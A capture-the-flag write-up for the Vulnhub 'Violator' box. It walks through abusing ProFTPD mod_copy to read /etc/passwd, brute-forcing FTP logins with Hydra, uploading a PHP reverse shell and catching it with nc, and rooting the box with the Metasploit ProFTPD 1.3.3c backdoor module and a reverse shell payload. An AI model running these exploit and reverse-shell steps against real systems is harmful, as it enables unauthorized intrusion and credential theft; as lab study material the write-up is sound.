Violator 1 Writeup

So today, I'm up against another one of knightmare's CTFs, called Violator.

Starting with this, we have 3 hints available:

  • Vince Clarke can help you with the Fast Fashion.
  • The challenge isn't over with root. The flag is something special.
  • I have put a few trolls in, but only to sport with you.

  • This challenge is themed after Depeche Mode's Violator album. First things first, start by nmaping the box.

    [email protected]:~/ctfs/violator# nmap -A -T4 -sV -p- -Pn -v
    Starting Nmap 7.40 ( ) at 2017-01-02 13:45 EET
    NSE: Loaded 143 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 13:45
    Completed NSE at 13:45, 0.00s elapsed
    Initiating NSE at 13:45
    Completed NSE at 13:45, 0.00s elapsed
    Initiating ARP Ping Scan at 13:45
    Scanning [1 port]
    Completed ARP Ping Scan at 13:45, 0.03s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 13:45
    Completed Parallel DNS resolution of 1 host. at 13:45, 6.53s elapsed
    Initiating SYN Stealth Scan at 13:45
    Scanning [65535 ports]
    Discovered open port 21/tcp on
    Discovered open port 80/tcp on
    Completed SYN Stealth Scan at 13:45, 2.67s elapsed (65535 total ports)
    Initiating Service scan at 13:45
    Scanning 2 services on
    Completed Service scan at 13:45, 10.02s elapsed (2 services on 1 host)
    Initiating OS detection (try #1) against
    NSE: Script scanning
    Initiating NSE at 13:45
    Completed NSE at 13:45, 10.06s elapsed
    Initiating NSE at 13:45
    Completed NSE at 13:45, 0.01s elapsed
    Nmap scan report for
    Host is up (0.00034s latency).
    Not shown: 65533 closed ports
    21/tcp open  ftp     ProFTPD 1.3.5rc3
    |_ftp-bounce: no banner
    80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: Apache/2.4.7 (Ubuntu)
    |_http-title: I Say... I say... I say Boy! You pumpin' for oil or somethin'...?
    MAC Address: 00:0C:29:3A:A2:41 (VMware)
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.6
    Uptime guess: 0.003 days (since Mon Jan  2 13:41:47 2017)
    Network Distance: 1 hop
    TCP Sequence Prediction: Difficulty=254 (Good luck!)
    IP ID Sequence Generation: All zeros
    Service Info: OS: Unix
    1   0.34 ms
    NSE: Script Post-scanning.
    Initiating NSE at 13:45
    Completed NSE at 13:45, 0.00s elapsed
    Initiating NSE at 13:45
    Completed NSE at 13:45, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at .
    Nmap done: 1 IP address (1 host up) scanned in 31.86 seconds
               Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

    Sooo, we got ftp and a web server. Let's check out the web server and see if there is anything there.

    Hm barking at the wrong tree here are we? Also a link for wikipedia's Violator album page, that might come in handy later on. The web server in general didn't have anything else of interest.

    Moving on, let's go for the other "tree". The other tree we have here is the ftp server.

    [email protected]:~/ctfs/violator# searchsploit proftpd 1.3.5
    ------------------------------------------------------------ ----------------------------------
     Exploit Title                                              |  Path
                                                                | (/usr/share/exploitdb/platforms)
    ------------------------------------------------------------ ----------------------------------
    ProFTPd 1.3.5 - File Copy                                   | /linux/remote/36742.txt
    ProFTPd 1.3.5 - (mod_copy) Remote Command Execution         | /linux/remote/
    ProFTPd 1.3.5 - 'Mod_Copy' Command Execution (Metasploit)   | /linux/remote/37262.rb
    ------------------------------------------------------------ ----------------------------------

    Ok now this is interesting. Let's see what we can do with that. By the exploits instructions, I can utilize the mod_copy module to read and write files.

    [email protected]:~/ctfs/violator# ftp
    Connected to
    220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:]
    Name ( anonymous
    331 Password required for anonymous
    530 Login incorrect.
    Login failed.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> site CPFR /etc/passwd
    350 File or directory exists, ready for destination name
    ftp> site CPTO /var/www/html/test
    250 Copy successful

    Ok, anonymous login failed, but the exploit seems to be working. And even more so the webroot seems to be writable. Let's check out the file that was created.

    So far so good, got a list of usernames back. Trying the same on /etc/shadow didn't work but oh well. The usernames, are a match for Depeche Mode members.

    [email protected]:~/ctfs/violator# cat userlist.txt 

    That would be Dave Gahan, Martin Gore, Andy Fletcher, and Alan Wilder.

    Moving forward, we were given a link for Violator's wiki page. However, grabbing a copy of that didn't actually help bruteforcing the ftp server with those usernames.

    Then it came to me that cewl wouldn't actually grab the song names, but seperated words. So I go and grab a list of Violator's tracklist by hand, with no spaces.

    [email protected]:~/ctfs/violator# cat passlist.txt 

    Let's fire up Hydra and see what can we find out of these.

    [email protected]:~/ctfs/violator# hydra -L userlist.txt -P passlist.txt
    Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
    Hydra ( starting at 2017-01-02 15:53:04
    [DATA] max 16 tasks per 1 server, overall 64 tasks, 60 login tries (l:4/p:15), ~0 tries per task
    [DATA] attacking service ftp on port 21
    [21][ftp] host:   login: dg   password: policyoftruth
    [21][ftp] host:   login: mg   password: bluedress
    [21][ftp] host:   login: af   password: enjoythesilence
    [21][ftp] host:   login: aw   password: sweetestperfection
    1 of 1 target successfully completed, 4 valid passwords found
    Hydra ( finished at 2017-01-02 15:53:32

    Alright, let's see what we can find from the ftp now. I connect as user dg first, and notice that I can see all 4 user home directories, so I grab a copy of them locally for a closer inspection.

    Inside af's home, there is a copy of Minarke. A simple google search shows that it's some kind of Enigma machine emulator so we'll most probably deal with Engima later on.

    aw's home contains a file labeled "hint" which mentions Enigma once again.

    [email protected]:~/ctfs/violator/homes/aw# cat hint 
    You are getting close... Can you crack the final enigma..?

    Also, mg's home contains a file called "faith_and_devotion" that contains something that looks like instructions for an enigma machine.

    [email protected]:~/ctfs/violator/homes/mg# cat faith_and_devotion 
    * Use Wermacht with 3 rotors
    * Reflector to B
    Initial: A B C
    Alphabet Ring: C B A
    Plug Board A-B, C-D

    So all things point to something that has to do with an Enigma machine. So far I even have the instructiosn for how it should be configured. I still need a cyphertext to decrypt though.

    Moving on dg's home contains many files and folders that will come into play later on probably. Also, the webroot was writeable as I saw earlier, so I move on to upload a php reverse shell and hope it works.

    Uploading the php-reverse-shell.php through the ftp in /var/www/html and navigating to it, after having started a local listener and...

    [email protected]:~# nc -lvp 1234
    listening on [any] 1234 ... inverse host lookup failed: Unknown host
    connect to [] from (UNKNOWN) [] 37572
    Linux violator 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
     14:54:15 up  1:48,  0 users,  load average: 0.00, 0.01, 0.05
    USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $ python -c 'import pty; pty.spawn("/bin/bash")'
    [email protected]:/$ 

    Worked like a charm. So let's see what we can find now.

    Now, we have passwords for all 4 users of the box. Let's start with user dg.

    [email protected]:/$ su dg
    su dg
    Password: policyoftruth
    [email protected]:/$ sudo -l
    sudo -l
    Matching Defaults entries for dg on violator:
        env_reset, mail_badpass,
    User dg may run the following commands on violator:
        (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
    [email protected]:/$

    Ok things are getting interesting...This user can run proftpd from his home directory (remember those many files and folders we mentioned earlier) as root. However, what's so special about this specific version of proftpd?

    [email protected]:~$ cd bd
    cd bd
    [email protected]:~/bd$ cd sbin
    cd sbin
    [email protected]:~/bd/sbin$ ./proftpd --version
    ./proftpd --version
    ProFTPD Version 1.3.3c
    [email protected]:~/bd/sbin$

    So this binary is of version 1.3.3c. The previous one that was open to the outside was 1.3.5c? Let's check and see if there is anything interesting about this specific version 1.3.3...

    [email protected]:~/ctfs/violator# searchsploit proftpd 1.3.3
    ---------------------------------------------------------------------------------------- ----------------------------------
     Exploit Title                                                                          |  Path
                                                                                            | (/usr/share/exploitdb/platforms)
    ---------------------------------------------------------------------------------------- ----------------------------------
    ProFTPd 1.3.3c - Compromised Source (Trojan) Remote Code Execution                      | /linux/remote/15662.txt
    ProFTPd 1.3.2rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)             | /linux/remote/16851.rb
    ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)           | /linux/remote/16878.rb
    ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)                                | /linux/remote/16921.rb
    ---------------------------------------------------------------------------------------- ----------------------------------

    Aha, command execution, on a binary that we can run as root. Smells like privilege escalation anyone?

    First we need to be able to start this instance of proftpd. However, if we start it as it is, since there will be a conflict with the other proftpd instance running, this one will default to using as the bind address and we will only be able to connect to it from inside the box. However, if we specify another proftpd.conf we can change the default port (that would be causing the conflict) and bind normally to (all interfaces).

    I make up a simple proftpd.conf with the following contents

    [email protected]:~/ctfs/violator# cat proftpd.conf
    # This is a basic ProFTPD configuration file (rename it to 
    # 'proftpd.conf' for actual use.  It establishes a single server
    # and a single anonymous login.  It assumes that you have a user/group
    # "nobody" and "ftp" for normal operation and anon.
    ServerName   "Depeche Mode Violator Server"
    ServerType   standalone
    DefaultServer   on
    # Belt up son!
    SocketBindTight   on
    # Port 21 is the standard FTP port.
    Port    2222
    # Listen onnly on lo
    # Don't use IPv6 support by default.
    UseIPv6    off
    # Umask 022 is a good standard umask to prevent new dirs and files
    # from being group and world writable.
    Umask    022
    # To prevent DoS attacks, set the maximum number of child processes
    # to 30.  If you need to allow more than 30 concurrent connections
    # at once, simply increase this value.  Note that this ONLY works
    # in standalone mode, in inetd mode you should use an inetd server
    # that allows you to limit maximum number of processes per service
    # (such as xinetd).
    MaxInstances   30
    # Set the user and group under which the server will run.
    User    root
    Group    root
    # To cause every FTP user to be "jailed" (chrooted) into their home
    # directory, uncomment this line.
    #DefaultRoot ~
    # Normally, we want files to be overwriteable.
    AllowOverwrite  on
    # Bar use of SITE CHMOD by default
    <Limit SITE_CHMOD>
    # A basic anonymous configuration, no upload directories.  If you do not
    # want anonymous users, simply delete this entire  section.
    <Anonymous ~ftp>
      User    root
      Group    root
      # We want clients to be able to login with "anonymous" as well as "ftp"
      UserAlias   anonymous ftp
      # Limit the maximum number of anonymous logins
      MaxClients   10
      # We want 'welcome.msg' displayed at login, and '.message' displayed
      # in each newly chdired directory.
      DisplayLogin   welcome.msg
      DisplayChdir   .message
      # Limit WRITE everywhere in the anonymous chroot
      <Limit WRITE>

    Then, I copy this file to dg's home directory through the original ftp I have open.

    Then, it's just a matter of running proftpd 1.3.3 from the directory it's in with the arguement for a specific config file.

    [email protected]:~/bd/sbin$ sudo ./proftpd -c /home/dg/proftpd.conf
    sudo ./proftpd -c /home/dg/proftpd.conf
     - setting default address to - SocketBindTight in effect, ignoring DefaultServer
    [email protected]:~/bd/sbin$ netstat -pantul
    netstat -pantul
    (Not all processes could be identified, non-owned process info
     will not be shown, you would have to be root to see it all.)
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
    tcp        0      0  *               LISTEN      -               
    tcp        0      0    ESTABLISHED 1107/bash       
    tcp6       0      0 :::21                   :::*                    LISTEN      -               
    tcp6       0      0 :::80                   :::*                    LISTEN      -               
    tcp6       0      0   ESTABLISHED -               
    tcp6       0      0   ESTABLISHED -               
    udp        0      0    *                           -               
    udp        0      0 *                           -               
    udp6       0      0 :::22912                :::*                                -               

    And it's up and running. Now I should be able to connect to it from my box and since metasploit has that module ready for us, grab a root shell.

    msf > use exploit/unix/ftp/proftpd_133c_backdoor 
    msf exploit(proftpd_133c_backdoor) > set RHOST
    RHOST =>
    msf exploit(proftpd_133c_backdoor) > set RPORT 2222
    RPORT => 2222
    msf exploit(proftpd_133c_backdoor) > set PAYLOAD cmd/unix/reverse_perl
    PAYLOAD => cmd/unix/reverse_perl
    msf exploit(proftpd_133c_backdoor) > set LHOST
    LHOST =>
    msf exploit(proftpd_133c_backdoor) > exploit
    [*] Started reverse TCP handler on 
    [*] - Sending Backdoor Command
    [*] Command shell session 1 opened ( -> at 2017-01-02 18:00:11 +0200
    python -c 'import pty; pty.spawn("/bin/bash")'
    [email protected]:/#

    There we have it. Root!

    But of course, it's not over yet. Let's go check out the flag. although don't forget that "Enigma" thing...we haven't found anything yet related to that.

    [email protected]:/# cd /root/
    cd /root/
    [email protected]:/root# ls -la
    ls -la
    total 24
    drwx------  3 root root 4096 Jun 14  2016 .
    drwxr-xr-x 22 root root 4096 Jun 14  2016 ..
    -rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
    d--x------  2 root root 4096 Jun 14  2016 .basildon
    -rw-r--r--  1 root root  114 Jun 12  2016 flag.txt
    -rw-r--r--  1 root root  140 Feb 20  2014 .profile
    [email protected]:/root# cat flag.txt
    cat flag.txt
    I say... I say... I say boy! Pumping for oil or something...?
    ---Foghorn Leghorn "A Broken Leghorn" 1950 (C) W.B.
    [email protected]:/root# ls -l .basildon
    ls -l .basildon
    total 140
    -rw-r--r-- 1 root root 140355 Jun 12  2016 crocs.rar
    [email protected]:/root#

    Still being taunted...let's see if we can find anything inside that crocs.rar. Grabbing a local copy seems the way to go.

    [email protected]:/root# cp .basildon/crocs.rar /var/www/html
    cp .basildon/crocs.rar /var/www/html
    Abort session 1? [y/N]  y
    [*] - Command shell session 1 closed.  Reason: User exit
    msf exploit(proftpd_133c_backdoor) > exit
    [email protected]:~/ctfs/violator# wget
    --2017-01-02 18:10:14--
    Connecting to connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 140355 (137K) [application/rar]
    Saving to: ‘crocs.rar’
    crocs.rar          100%[==============>] 137.07K  --.-KB/s    in 0.001s  
    2017-01-02 18:10:14 (93.3 MB/s) - ‘crocs.rar’ saved [140355/140355]

    So, now let's see what can we do about this.

    [email protected]:~/ctfs/violator# file crocs.rar 
    crocs.rar: RAR archive data, v4, os: Win32
    [email protected]:~/ctfs/violator# unrar e crocs.rar
    UNRAR 5.30 beta 2 freeware      Copyright (c) 1993-2015 Alexander Roshal
    Extracting from crocs.rar
    Enter password (will not be echoed) for artwork.jpg: 
    Extracting  artwork.jpg                                               23%
    Checksum error in the encrypted file artwork.jpg. Corrupt file or wrong password.
    Total errors: 1

    Of course it would need a passcode which I don't have. At least we know it contains an image right? No...

    Using rar2john, I take make the respective file for input into JTR and decide to throw my previous list at it.

    [email protected]:~/ctfs/violator# rar2john crocs.rar > toCrack.txt
    file name: artwork.jpg
    [email protected]:~/ctfs/violator# john --wordlist:passlist.txt toCrack.txt 
    Using default input encoding: UTF-8
    Loaded 1 password hash (rar, RAR3 [SHA1 AES 32/64])
    Press 'q' or Ctrl-C to abort, almost any other key for status
    0g 0:00:00:00 DONE (2017-01-02 18:32) 0g/s 34.88p/s 34.88c/s 34.88C/s seaofsin
    Session completed

    No joy. I even throw other lists at it, including rockyou, a wordlist created using cewl on the wiki page etc. Still nothing. At this I'm getting pissed off so I'm starting to throw words at it.

    import requests
    import re
    r = requests.get('')
    regex = "\"([\w*\s]*)\""
    list = re.findall(regex, r.text)
    with open ("wordlist.txt", "a") as wordlist:
     for item in list:
      itemNoSpaces = item.replace(" ","")
      itemAllLower = item.lower()
      itemNoSpaceLower = itemNoSpaces.lower()

    For example this little ugliness, grabs all phrases between quotes and drops them in my already created cewl list, with and without spaces, with and without caps. Also sorting the wordlist is always a good practice.

    [email protected]:~/ctfs/violator# cewl '' -d 0 -w wordlist.txt
    CeWL 5.3 (Heading Upwards) Robin Wood ([email protected]) (
    [email protected]:~/ctfs/violator# python 
    [email protected]:~/ctfs/violator# sort -u wordlist.txt > wordlist-final.txt
    [email protected]:~/ctfs/violator# ls -lh
    total 284K
    -rw-r--r-- 1 root root 138K Jan  2 18:09 crocs.rar
    -rw-r--r-- 1 root root  467 Jan  2 19:37
    drwxr-xr-x 6 root root 4.0K Jan  2 16:29 homes
    -rw-r--r-- 1 root root  175 Jun 28  2016 passlist.txt
    -rwxr-xr-x 1 root root 5.4K Jan  2 16:53 php-reverse-shell.php
    -rw-r--r-- 1 root root 2.0K Jun 30  2016 proftpd.conf
    -rw-r--r-- 1 root root  179 Jan  2 18:21
    -rw-r--r-- 1 root root   93 Jan  2 18:31 toCrack.txt
    -rw-r--r-- 1 root root   12 Jun 28  2016 userlist.txt
    -rw-r--r-- 1 root root  33K Jan  2 19:44 wordlist-final.txt
    -rw-r--r-- 1 root root  66K Jan  2 19:43 wordlist.txt

    The final one is half the size of the original one, so there were many duplicates in it. Let's try again with john...

    [email protected]:~/ctfs/violator# john --wordlist:wordlist-final.txt --rules toCrack.txt 
    Using default input encoding: UTF-8
    Rules/masks using ISO-8859-1
    Loaded 1 password hash (rar, RAR3 [SHA1 AES 32/64])
    Press 'q' or Ctrl-C to abort, almost any other key for status
    World in My Eyes (crocs.rar)
    1g 0:00:01:09 DONE (2017-01-02 19:49) 0.01442g/s 39.96p/s 39.96c/s 39.96C/s World in My Eyes
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed

    Finally! The passphrase was "World in My Eyes". That little script proved helpful.

    Now let's open that file and see what's inside.

    [email protected]:~/ctfs/violator# unrar e crocs.rar 
    UNRAR 5.30 beta 2 freeware      Copyright (c) 1993-2015 Alexander Roshal
    Extracting from crocs.rar
    Enter password (will not be echoed) for artwork.jpg: 
    Extracting  artwork.jpg                                               OK 
    All OK
    [email protected]:~/ctfs/violator# file artwork.jpg 
    artwork.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=10, description=Violator, software=Google], baseline, precision 8, 1450x1450, frames 3
    [email protected]:~/ctfs/violator# exiftool artwork.jpg 
    ExifTool Version Number         : 10.36
    File Name                       : artwork.jpg
    Directory                       : .
    File Size                       : 183 kB
    File Modification Date/Time     : 2016:06:12 14:38:12+03:00
    File Access Date/Time           : 2017:01:02 19:52:14+02:00
    File Inode Change Date/Time     : 2017:01:02 19:51:48+02:00
    File Permissions                : rw-r--r--
    File Type                       : JPEG
    File Type Extension             : jpg
    MIME Type                       : image/jpeg
    JFIF Version                    : 1.01
    Resolution Unit                 : inches
    X Resolution                    : 300
    Y Resolution                    : 300
    Exif Byte Order                 : Big-endian (Motorola, MM)
    Image Description               : Violator
    Software                        : Google
    Artist                          : Dave Gaham
    Exif Version                    : 0220
    Date/Time Original              : 1990:03:19 22:13:30
    Create Date                     : 1990:03:19 22:13:30
    Sub Sec Time Original           : 04
    Sub Sec Time Digitized          : 04
    Exif Image Width                : 1450
    Exif Image Height               : 1450
    XP Title                        : Violator
    XP Author                       : Dave Gaham
    XP Keywords                     : created by user dg
    XP Subject                      : policyoftruth
    Padding                         : (Binary data 1590 bytes, use -b option to extract)
    About                           : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b
    Creator                         : Dave Gaham
    Subject                         : created by user dg
    Title                           : Violator
    Description                     : Violator
    Warning                         : [minor] Fixed incorrect URI for xmlns:MicrosoftPhoto
    Date Acquired                   : 1941:05:09 10:30:18.134
    Last Keyword XMP                : created by user dg
    Image Width                     : 1450
    Image Height                    : 1450
    Encoding Process                : Baseline DCT, Huffman coding
    Bits Per Sample                 : 8
    Color Components                : 3
    Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
    Image Size                      : 1450x1450
    Megapixels                      : 2.1
    Create Date                     : 1990:03:19 22:13:30.04
    Date/Time Original              : 1990:03:19 22:13:30.04

    A jpeg, but exiftool gave us some very odd "Copyrights". Something tells me that this is our Enigma cyphertext.

    At this point, I tried with the binary thingy included in the box, but it just pissed me off and I never managed to configure it correctly to get some useful meaning out of this.

    However, I found this site that contains all the necessary thingies to make something out of this.

    Configuring the "machine" there with the settings that I found earlier, and feeding it the cyphertext from the image...

    Or in a more readable form...


    Finally, knightmare mentioned in tweet that the final message should read BGH 393X which is the license plate for a 1981 Ford Corina MkV in the music video for the Depeche Mode song ‘Useless’.

    All in all a nice box to mess around with with fun challenges.

    Once again, thanks a lot goes to knightmare for creating yet another ctf and Vulnhub for hosting it.


    Post a Comment